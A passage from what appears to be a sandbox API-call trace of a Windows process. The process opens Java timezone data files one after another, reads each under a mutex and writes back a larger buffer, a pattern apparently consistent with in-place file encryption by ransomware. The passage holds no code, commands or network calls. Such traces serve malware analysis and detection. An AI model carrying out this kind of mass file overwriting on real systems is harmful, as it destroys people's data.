lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0139.413] WriteFile (in: hFile=0x1f0, lpBuffer=0x2870cb8*, nNumberOfBytesToWrite=0xa5c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870cb8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xa5c, lpOverlapped=0x0) returned 1 [0139.413] CloseHandle (hObject=0x1f0) returned 1 [0139.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jayapura"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0139.414] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.414] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x55 [0139.414] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.414] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.414] ReleaseMutex (hMutex=0x168) returned 1 [0139.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jayapura", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0139.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jayapura", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Jayapura", lpUsedDefaultChar=0x0) returned 8 [0139.415] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fbadd8, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbadd8*, lpNumberOfBytesRead=0x2d5f2bc*=0x55, lpOverlapped=0x0) returned 1 [0139.416] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0139.416] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0139.416] CloseHandle (hObject=0x1f0) returned 1 [0139.417] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kolkata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0139.417] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.417] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x61 [0139.417] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.418] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.418] ReleaseMutex (hMutex=0x168) returned 1 [0139.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kolkata", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0139.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kolkata", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kolkata", lpUsedDefaultChar=0x0) returned 7 [0139.418] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f565b8, nNumberOfBytesToRead=0x61, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f565b8*, lpNumberOfBytesRead=0x2d5f2bc*=0x61, lpOverlapped=0x0) returned 1 [0139.419] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0139.419] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5e9, lpOverlapped=0x0) returned 1 [0139.419] CloseHandle (hObject=0x1f0) returned 1 [0139.420] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\manila"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0139.420] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.420] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7d [0139.421] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.421] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.421] ReleaseMutex (hMutex=0x168) returned 1 [0139.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Manila", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0139.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Manila", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Manila", lpUsedDefaultChar=0x0) returned 6 [0139.421] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f2f048, nNumberOfBytesToRead=0x7d, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f2f048*, lpNumberOfBytesRead=0x2d5f2bc*=0x7d, lpOverlapped=0x0) returned 1 [0139.422] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0139.422] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x605, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x605, lpOverlapped=0x0) returned 1 [0139.427] CloseHandle (hObject=0x1f0) returned 1 [0139.427] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pontianak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0139.427] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.428] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7d [0139.428] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.428] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.428] ReleaseMutex (hMutex=0x168) returned 1 [0139.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pontianak", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pontianak", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pontianak", lpUsedDefaultChar=0x0) returned 9 [0139.428] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f2f048, nNumberOfBytesToRead=0x7d, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f2f048*, lpNumberOfBytesRead=0x2d5f2bc*=0x7d, lpOverlapped=0x0) returned 1 [0139.429] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0139.429] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x605, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x605, lpOverlapped=0x0) returned 1 [0139.430] CloseHandle (hObject=0x1f0) returned 1 [0139.430] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh89"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0139.431] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.431] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x129d [0139.431] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.431] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.432] ReleaseMutex (hMutex=0x168) returned 1 [0139.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riyadh89", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0139.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riyadh89", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Riyadh89", lpUsedDefaultChar=0x0) returned 8 [0139.437] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x129d, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2d5f2bc*=0x129d, lpOverlapped=0x0) returned 1 [0139.450] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0139.450] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1825, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1825, lpOverlapped=0x0) returned 1 [0139.450] CloseHandle (hObject=0x1f0) returned 1 [0139.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tbilisi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0139.451] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.451] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1d5 [0139.451] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.451] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.451] ReleaseMutex (hMutex=0x168) returned 1 [0139.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tbilisi", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0139.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tbilisi", cchWideChar=7, lpMultiByteStr=0x1f7ad44, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tbilisi", lpUsedDefaultChar=0x0) returned 7 [0139.451] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1d5, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2d5f2bc*=0x1d5, lpOverlapped=0x0) returned 1 [0139.452] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0139.453] WriteFile (in: hFile=0x1f0, lpBuffer=0x287d138*, nNumberOfBytesToWrite=0x75d, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x287d138*, lpNumberOfBytesWritten=0x2d5f2d0*=0x75d, lpOverlapped=0x0) returned 1 [0139.453] CloseHandle (hObject=0x1f0) returned 1 [0139.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vladivostok"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0139.454] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.454] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x245 [0139.454] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.454] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.454] ReleaseMutex (hMutex=0x168) returned 1 [0139.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vladivostok", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vladivostok", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vladivostok", lpUsedDefaultChar=0x0) returned 11 [0139.454] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x245, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2d5f2bc*=0x245, lpOverlapped=0x0) returned 1 [0139.455] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0139.455] WriteFile (in: hFile=0x1f0, lpBuffer=0x287d138*, nNumberOfBytesToWrite=0x7cd, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x287d138*, lpNumberOfBytesWritten=0x2d5f2d0*=0x7cd, lpOverlapped=0x0) returned 1 [0139.456] CloseHandle (hObject=0x1f0) returned 1 [0139.456] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\faroe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0139.456] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.456] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3f8 [0139.456] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.457] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.457] ReleaseMutex (hMutex=0x168) returned 1 [0139.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faroe", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faroe", cchWideChar=5, lpMultiByteStr=0x1f7ad44, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faroe", lpUsedDefaultChar=0x0) returned 5 [0139.457] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x3f8, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x2d5f2bc*=0x3f8, lpOverlapped=0x0) returned 1 [0139.459] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0139.459] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x980, lpOverlapped=0x0) returned 1 [0139.459] CloseHandle (hObject=0x1f0) returned 1 [0139.459] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\broken_hill"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0139.460] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.460] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4c8 [0139.460] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0139.460] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.460] ReleaseMutex (hMutex=0x168) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Broken_Hill", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Broken_Hill", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Broken_Hill", lpUsedDefaultChar=0x0) returned 11 [0139.461] ReadFile (in: hFile=0x1f0, lpBuffer=0x2890348, nNumberOfBytesToRead=0x4c8, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2890348*, lpNumberOfBytesRead=0x2d5f2bc*=0x4c8, lpOverlapped=0x0) returned 1 [0140.728] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0140.728] WriteFile (in: hFile=0x1f0, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xa50, lpOverlapped=0x0) returned 1 [0140.728] CloseHandle (hObject=0x1f0) returned 1 [0140.728] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\perth"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0140.729] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0140.730] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xcd [0140.730] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0140.730] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.018] ReleaseMutex (hMutex=0x168) returned 1 [0141.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Perth", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Perth", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Perth", lpUsedDefaultChar=0x0) returned 5 [0141.019] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xcd, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x2d5f2bc*=0xcd, lpOverlapped=0x0) returned 1 [0141.020] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0141.020] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x655, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x655, lpOverlapped=0x0) returned 1 [0141.020] CloseHandle (hObject=0x1f0) returned 1 [0141.020] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0141.026] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.026] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1b [0141.027] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0141.027] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.030] ReleaseMutex (hMutex=0x168) returned 1 [0141.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+1", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, 